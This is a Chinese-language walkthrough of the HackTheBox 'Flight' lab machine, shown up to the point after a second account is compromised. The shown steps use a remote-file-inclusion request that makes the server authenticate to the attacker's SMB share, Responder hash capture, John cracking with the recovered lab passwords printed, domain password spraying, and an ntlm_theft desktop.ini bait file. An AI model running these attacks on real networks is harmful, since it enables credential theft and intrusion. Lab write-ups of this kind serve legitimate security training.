HackThebox-Flight

他就站在顶楼上

看着远方

幻想着希望

吞着绝望

靶机ip：10.129.228.120

难度：困难

涉及内容：

基于 Gobuster 的 VHOST 虚拟主机枚举与边界突破

远程文件包含漏洞（RFI）配合 SMB 协议触发 NTLM 认证

利用 Responder 监听并截获 NTLMv2 Hash，结合 John 进行离线破解

基于 NetExec (nxc) 的 SMB 共享枚举与域内密码喷洒（Password Spraying）攻击

利用 ntlm_theft 生成 .ini 诱饵文件，实现无交互的二次哈希窃取

基于 SMB 协议的文件读写权限利用与 Webshell 植入

利用 RunasCs 进行受限环境下的用户身份切换（SU）

内网端口存活探测与利用 Chisel 构建本地端口转发隧道

IIS 进程账户 SeImpersonatePrivilege 权限识别

利用 Rubeus 执行 Kerberos 伪委派（Fake Delegation TGT）攻击

利用 Impacket 套件执行 DCSync 导出域管哈希及 Pass-the-Hash (PTH) 攻击

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.228.120
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.228.120:53
Open 10.129.228.120:80
Open 10.129.228.120:445
Open 10.129.228.120:464
Open 10.129.228.120:389
Open 10.129.228.120:593
Open 10.129.228.120:636
Open 10.129.228.120:3268
Open 10.129.228.120:3269
Open 10.129.228.120:9389
Open 10.129.228.120:49667
Open 10.129.228.120:49673
Open 10.129.228.120:49674
Open 10.129.228.120:49695
Open 10.129.228.120:49723
[~] Starting Script(s)
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-18 07:26 +0000
Initiating Ping Scan at 07:26
Scanning 10.129.228.120 [4 ports]
Completed Ping Scan at 07:26, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:26
Completed Parallel DNS resolution of 1 host. at 07:26, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:26
Scanning 10.129.228.120 [15 ports]
Discovered open port 445/tcp on 10.129.228.120
Discovered open port 53/tcp on 10.129.228.120
Discovered open port 80/tcp on 10.129.228.120
Discovered open port 636/tcp on 10.129.228.120
Discovered open port 593/tcp on 10.129.228.120
Discovered open port 49673/tcp on 10.129.228.120
Discovered open port 49674/tcp on 10.129.228.120
Discovered open port 464/tcp on 10.129.228.120
Discovered open port 49723/tcp on 10.129.228.120
Discovered open port 3268/tcp on 10.129.228.120
Discovered open port 389/tcp on 10.129.228.120
Discovered open port 9389/tcp on 10.129.228.120
Discovered open port 49695/tcp on 10.129.228.120
Discovered open port 3269/tcp on 10.129.228.120
Discovered open port 49667/tcp on 10.129.228.120
Completed SYN Stealth Scan at 07:26, 1.74s elapsed (15 total ports)
Nmap scan report for 10.129.228.120
Host is up, received echo-reply ttl 127 (0.47s latency).
Scanned at 2026-06-18 07:26:19 UTC for 2s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49695/tcp open  unknown          syn-ack ttl 127
49723/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds
           Raw packets sent: 19 (812B) | Rcvd: 16 (688B)

访问80端口

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 10.129.228.120
<!DOCTYPE html>
<html lang="en">
<head>
<title>g0 Aviation</title>
<meta charset="utf-8">
<link rel="stylesheet" href="css/reset.css" type="text/css" media="all">
<link rel="stylesheet" href="css/layout.css" type="text/css" media="all">
<link rel="stylesheet" href="css/style.css" type="text/css" media="all">
<script type="text/javascript" src="js/jquery-1.4.2.js" ></script>
<script type="text/javascript" src="js/cufon-yui.js"></script>
<script type="text/javascript" src="js/cufon-replace.js"></script>
<script type="text/javascript" src="js/Myriad_Pro_italic_600.font.js"></script>
<script type="text/javascript" src="js/Myriad_Pro_italic_400.font.js"></script>
<script type="text/javascript" src="js/Myriad_Pro_400.font.js"></script>
<!--[if lt IE 9]>
<script type="text/javascript" src="js/ie6_script_other.js"></script>
<script type="text/javascript" src="js/html5.js"></script>
<![endif]-->
</head>
<body id="page1">
<!-- START PAGE SOURCE -->
<div class="body1">
  <div class="main">
    <header>
      <div class="wrapper">
        <h1><a href="index.html" id="logo">g0</a><span id="slogan">International Travel</span></h1>
        <div class="right">
          <nav>
            <ul id="top_nav">
              <li><a href="#"><img src="images/img1.gif" alt=""></a></li>
              <li><a href="#"><img src="images/img2.gif" alt=""></a></li>
              <li class="bg_none"><a href="#"><img src="images/img3.gif" alt=""></a></li>
            </ul>
          </nav>
          <nav>
            <ul id="menu">
              <li id="menu_active"><a href="index.html">Home</a></li>
              <li><a href="#">Our Aircraft</a></li>
              <li><a href="#">Safety</a></li>
              <li><a href="#">Charters</a></li>
              <li><a href="#">Contacts</a></li>
            </ul>
          </nav>
        </div>
      </div>
    </header>
  </div>
</div>
<div class="main">
  <div id="banner">
    <div class="text1"> COMFORT<span>Guaranteed</span>
      <p>g0 is the world's largest aerospace company and leading manufacturer of commercial jetliners, defense, space and security systems, and service provider of aftermarket support.</p>
    </div>
    <a href="#" class="button_top">Order Tickets Online</a></div>
</div>
<div class="main">
  <section id="content">
    <article class="col1">
      <div class="pad_1">
        <h2>Your Flight Planner</h2>
        <form id="form_1" action="#" method="post">
          <div class="wrapper pad_bot1">
            <div class="radio marg_right1">
              <input type="radio" name="name1">
              Round Trip<br>
              <input type="radio" name="name1">
              One Way </div>
            <div class="radio">
              <input type="radio" name="name1">
              Empty-Leg<br>
              <input type="radio" name="name1">
              Multi-Leg </div>
          </div>
          <div class="wrapper"> Leaving From:
            <div class="bg">
              <input type="text" class="input input1" value="Enter City or Airport Code" onBlur="if(this.value=='') this.value='Enter City or Airport Code'" onFocus="if(this.value =='Enter City or Airport Code' ) this.value=''">
            </div>
          </div>
          <div class="wrapper"> Going To:
            <div class="bg">
              <input type="text" class="input input1" value="Enter City or Airport Code" onBlur="if(this.value=='') this.value='Enter City or Airport Code'" onFocus="if(this.value =='Enter City or Airport Code' ) this.value=''">
            </div>
          </div>
          <div class="wrapper"> Departure Date and Time:
            <div class="wrapper">
              <div class="bg left">
                <input type="text" class="input input2" value="mm/dd/yyyy " onBlur="if(this.value=='') this.value='mm/dd/yyyy '" onFocus="if(this.value =='mm/dd/yyyy ' ) this.value=''">
              </div>
              <div class="bg right">
                <input type="text" class="input input2" value="12:00am" onBlur="if(this.value=='') this.value='12:00am'" onFocus="if(this.value =='12:00am' ) this.value=''">
              </div>
            </div>
          </div>
          <div class="wrapper"> Return Date and Time:
            <div class="wrapper">
              <div class="bg left">
                <input type="text" class="input input2" value="mm/dd/yyyy " onBlur="if(this.value=='') this.value='mm/dd/yyyy '" onFocus="if(this.value =='mm/dd/yyyy ' ) this.value=''">
              </div>
              <div class="bg right">
                <input type="text" class="input input2" value="12:00am" onBlur="if(this.value=='') this.value='12:00am'" onFocus="if(this.value =='12:00am' ) this.value=''">
              </div>
            </div>
          </div>
          <div class="wrapper">
            <p>Passenger(s):</p>
            <div class="bg left">
              <input type="text" class="input input2" value="# passengers" onBlur="if(this.value=='') this.value='# passengers'" onFocus="if(this.value =='# passengers' ) this.value=''">
            </div>
            <a href="#" class="button2">go!</a> </div>
        </form>
        <h2>Recent News</h2>
        <p class="under"><a href="#" class="link1">Nemo enim ipsam voluptatem quia</a><br>
          November 5, 2010</p>
        <p class="under"><a href="#" class="link1">Voluptas aspernatur autoditaut fjugit</a><br>
          November 1, 2010</p>
        <p><a href="#" class="link1">Sed quia consequuntur magni</a><br>
          October 23, 2010</p>
      </div>
    </article>
    <article class="col2 pad_left1">
      <h2>Welcome to our Website!</h2>
      <p class="color1">As Italy's biggest manufacturing exporter, the company supports airlines and allied government customers in more than 150 countries.</p>

      <div class="wrapper pad_bot2"> <a href="#" class="button1">Reservation</a> <a href="#" class="button2">Fleet</a> </div>
      <div class="wrapper">
        <article class="cols">
          <h2>Apply to out Team!</h2>
          <p><strong>We are Hiring</strong> We are looking for talented engineers specializing in aeronautics. Quick apply to our team by going to the contact page.</p>
        </article>
        <div class="box1">
          <div class="pad_1">
            <div class="wrapper">
            </div>
          </div>
        </div>
      </div>
    </article>
  </section>
</div>
<div class="body2">
  <div class="main">
    <footer>
      <div class="footerlink">
        <p class="lf">Copyright 2022 <a href="#">flight.htb</a> - All Rights Reserved</p>
        <p class="rf">Designed by <a href="https://twitter.com/Geiseric4" class="twitter">Geiseric</a> & <a href="https://twitter.com/Janit10043163" class="twitter">JDgodd</a></p>
        <div style="clear:both;"></div>
      </div>
    </footer>
  </div>
</div>
<script type="text/javascript"> Cufon.now(); </script>
<!-- END PAGE SOURCE -->
</body>
</html>

加入域名

枚举子域名

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://flight.htb/ --append-domain -t 25 -k | grep -v "302"
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       http://flight.htb/
[+] Method:                    GET
[+] Threads:                   25
[+] Wordlist:                  /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:                gobuster/3.8.2
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
[ERROR] error on word web: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word portal: timeout occurred during the request
[ERROR] error on word server: timeout occurred during the request
[ERROR] error on word sip: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word wordpress: timeout occurred during the request
[ERROR] error on word images8: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word cas: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word origin-www: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word cisco: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word banner: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word mercury: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] error on word w: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body)
school.flight.htb Status: 200 [Size: 3996]

加入并访问

1	`http://school.flight.htb/index.php?view=home.html`

注意到参数view

尝试进行本地文件包含

失败

尝试进行远程文件包含

┌──(root?kaada)-[/home/kali/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

想到可不可以用responder捕获哈希

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# responder -I tun0 -Pdv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]
    DHCPv6                     [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.31]
    Responder IPv6             [fe80::2549:a32b:73b5:da30]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-GE07T71GBKY]
    Responder Domain Name      [HF3Y.LOCAL]
    Responder DCE-RPC Port     [49830]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

1	`http://school.flight.htb/index.php?view=//10.10.14.31/kali`

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sudo responder -I tun0 -Pdv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]
    DHCPv6                     [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.31]
    Responder IPv6             [fe80::2549:a32b:73b5:da30]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-E61L294M4DH]
    Responder Domain Name      [D0VM.LOCAL]
    Responder DCE-RPC Port     [48269]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:fcae80b4929051aa:792C44012A1309E3354D295B08C179CD:010100000000000000357229F7FEDC01765069488C1909A600000000020008004400300056004D0001001E00570049004E002D004500360031004C003200390034004D0034004400480004003400570049004E002D004500360031004C003200390034004D003400440048002E004400300056004D002E004C004F00430041004C00030014004400300056004D002E004C004F00430041004C00050014004400300056004D002E004C004F00430041004C000700080000357229F7FEDC01060004000200000008003000300000000000000000000000003000000327CBFCA25E61FF6505FC177932A83960A32F39646287F05F6910CFBC5B5B9F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330031000000000000000000

用john破解

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "" > hash.txt 
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim hash.txt  
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt --wordlist=rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
S@Ss!K@*t13      (svc_apache)     
1g 0:00:00:21 DONE (2026-06-18 07:53) 0.04712g/s 502541p/s 502541c/s 502541C/s SADSAM..S42150461
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

得到凭证svc_apache:S@Ss!K@*t13

探测smb权限

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'svc_apache' -p 'S@Ss!K@*t13'
SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.228.120  445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13

尝试列出共享和用户

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'svc_apache' -p 'S@Ss!K@*t13' --shares
SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.228.120  445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.129.228.120  445    G0               [*] Enumerated shares
SMB         10.129.228.120  445    G0               Share           Permissions     Remark
SMB         10.129.228.120  445    G0               -----           -----------     ------
SMB         10.129.228.120  445    G0               ADMIN$                          Remote Admin
SMB         10.129.228.120  445    G0               C$                              Default share
SMB         10.129.228.120  445    G0               IPC$            READ            Remote IPC
SMB         10.129.228.120  445    G0               NETLOGON        READ            Logon server share 
SMB         10.129.228.120  445    G0               Shared          READ            
SMB         10.129.228.120  445    G0               SYSVOL          READ            Logon server share 
SMB         10.129.228.120  445    G0               Users           READ            
SMB         10.129.228.120  445    G0               Web             READ

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'svc_apache' -p 'S@Ss!K@*t13' --users 
SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.228.120  445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.129.228.120  445    G0               -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.228.120  445    G0               Administrator                 2022-09-22 20:17:02 0       Built-in account for administering the computer/domain 
SMB         10.129.228.120  445    G0               Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.129.228.120  445    G0               krbtgt                        2022-09-22 19:48:01 0       Key Distribution Center Service Account 
SMB         10.129.228.120  445    G0               S.Moon                        2022-09-22 20:08:22 0       Junion Web Developer 
SMB         10.129.228.120  445    G0               R.Cold                        2022-09-22 20:08:22 0       HR Assistant 
SMB         10.129.228.120  445    G0               G.Lors                        2022-09-22 20:08:22 0       Sales manager 
SMB         10.129.228.120  445    G0               L.Kein                        2022-09-22 20:08:22 0       Penetration tester 
SMB         10.129.228.120  445    G0               M.Gold                        2022-09-22 20:08:22 0       Sysadmin 
SMB         10.129.228.120  445    G0               C.Bum                         2022-09-22 20:08:22 0       Senior Web Developer 
SMB         10.129.228.120  445    G0               W.Walker                      2022-09-22 20:08:22 0       Payroll officer 
SMB         10.129.228.120  445    G0               I.Francis                     2022-09-22 20:08:22 0       Nobody knows why he's here 
SMB         10.129.228.120  445    G0               D.Truff                       2022-09-22 20:08:22 0       Project Manager 
SMB         10.129.228.120  445    G0               V.Stevens                     2022-09-22 20:08:22 0       Secretary 
SMB         10.129.228.120  445    G0               svc_apache                    2022-09-22 20:08:23 0       Service Apache web 
SMB         10.129.228.120  445    G0               O.Possum                      2022-09-22 20:08:23 0       Helpdesk 
SMB         10.129.228.120  445    G0               [*] Enumerated 15 local users: flight

进行一波密码喷洒

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat users.txt 
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
O.Possum

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u users.txt -p 'S@Ss!K@*t13'  
SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.228.120  445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'S.Moon' -p 'S@Ss!K@*t13'  --shares
SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.228.120  445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.129.228.120  445    G0               [*] Enumerated shares
SMB         10.129.228.120  445    G0               Share           Permissions     Remark
SMB         10.129.228.120  445    G0               -----           -----------     ------
SMB         10.129.228.120  445    G0               ADMIN$                          Remote Admin
SMB         10.129.228.120  445    G0               C$                              Default share
SMB         10.129.228.120  445    G0               IPC$            READ            Remote IPC
SMB         10.129.228.120  445    G0               NETLOGON        READ            Logon server share 
SMB         10.129.228.120  445    G0               Shared          READ,WRITE      
SMB         10.129.228.120  445    G0               SYSVOL          READ            Logon server share 
SMB         10.129.228.120  445    G0               Users           READ            
SMB         10.129.228.120  445    G0               Web             READ

有权限写入一个目录

使用Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)进行文件生成，尝试获取ntlm哈希。

┌──(root㉿kaada)-[/opt]
└─# git clone https://github.com/Greenwolf/ntlm_theft.git
Cloning into 'ntlm_theft'...
remote: Enumerating objects: 151, done.
remote: Counting objects: 100% (38/38), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 151 (delta 31), reused 24 (delta 24), pack-reused 113 (from 1)
Receiving objects: 100% (151/151), 2.12 MiB | 52.00 KiB/s, done.
Resolving deltas: 100% (73/73), done.

┌──(root㉿kaada)-[/opt/ntlm_theft]
└─# python3 ntlm_theft.py --generate all --server 10.10.14.31 --filename exploit
/opt/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
  location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: exploit/exploit.scf (BROWSE TO FOLDER)
Created: exploit/exploit-(url).url (BROWSE TO FOLDER)
Created: exploit/exploit-(icon).url (BROWSE TO FOLDER)
Created: exploit/exploit.lnk (BROWSE TO FOLDER)
Created: exploit/exploit.rtf (OPEN)
Created: exploit/exploit-(stylesheet).xml (OPEN)
Created: exploit/exploit-(fulldocx).xml (OPEN)
Created: exploit/exploit.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: exploit/exploit-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: exploit/exploit-(includepicture).docx (OPEN)
Created: exploit/exploit-(remotetemplate).docx (OPEN)
Created: exploit/exploit-(frameset).docx (OPEN)
Created: exploit/exploit-(externalcell).xlsx (OPEN)
Created: exploit/exploit.wax (OPEN)
Created: exploit/exploit.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: exploit/exploit.asx (OPEN)
Created: exploit/exploit.jnlp (OPEN)
Created: exploit/exploit.application (DOWNLOAD AND OPEN)
Created: exploit/exploit.pdf (OPEN AND ALLOW)
Created: exploit/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: exploit/exploit.library-ms (BROWSE TO FOLDER)
Created: exploit/Autorun.inf (BROWSE TO FOLDER)
Created: exploit/desktop.ini (BROWSE TO FOLDER)
Created: exploit/exploit.theme (THEME TO INSTALL
Generation Complete.

┌──(root㉿kaada)-[/opt/ntlm_theft]
└─# cd exploit   
                                                                                                                
┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/shared -U S.Moon 'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \exploit.m3u
smb: \> put desktop.ini
putting file desktop.ini as \desktop.ini (0.1 kB/s) (average 0.1 kB/s)
smb: \>

responder成功捕获到了哈希

┌──(root㉿kaada)-[/home/kali/Desktop]
└─#  sudo responder -I tun0 -Pdv

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]
    DHCPv6                     [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.31]
    Responder IPv6             [fe80::2549:a32b:73b5:da30]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-ZI44R4LFFPC]
    Responder Domain Name      [NTW5.LOCAL]
    Responder DCE-RPC Port     [45802]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:ddc9affd6aef244a:9C22C6A89F135EA47546255832050453:01010000000000000005DF9EF9FEDC017A1BAA01737F9D2800000000020008004E0054005700350001001E00570049004E002D005A00490034003400520034004C00460046005000430004003400570049004E002D005A00490034003400520034004C0046004600500043002E004E005400570035002E004C004F00430041004C00030014004E005400570035002E004C004F00430041004C00050014004E005400570035002E004C004F00430041004C00070008000005DF9EF9FEDC01060004000200000008003000300000000000000000000000003000000327CBFCA25E61FF6505FC177932A83960A32F39646287F05F6910CFBC5B5B9F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330031000000000000000000

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "" > hash.txt
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim hash.txt
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)     
1g 0:00:00:22 DONE (2026-06-18 08:12) 0.04363g/s 459727p/s 459727c/s 459727C/s TinyMutt69..Tiffani29
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

查看该用户权限

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'c.bum' -p 'Tikkycoll_431012284'  --shares
SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.228.120  445    G0               [+] flight.htb\c.bum:Tikkycoll_431012284 
SMB         10.129.228.120  445    G0               [*] Enumerated shares
SMB         10.129.228.120  445    G0               Share           Permissions     Remark
SMB         10.129.228.120  445    G0               -----           -----------     ------
SMB         10.129.228.120  445    G0               ADMIN$                          Remote Admin
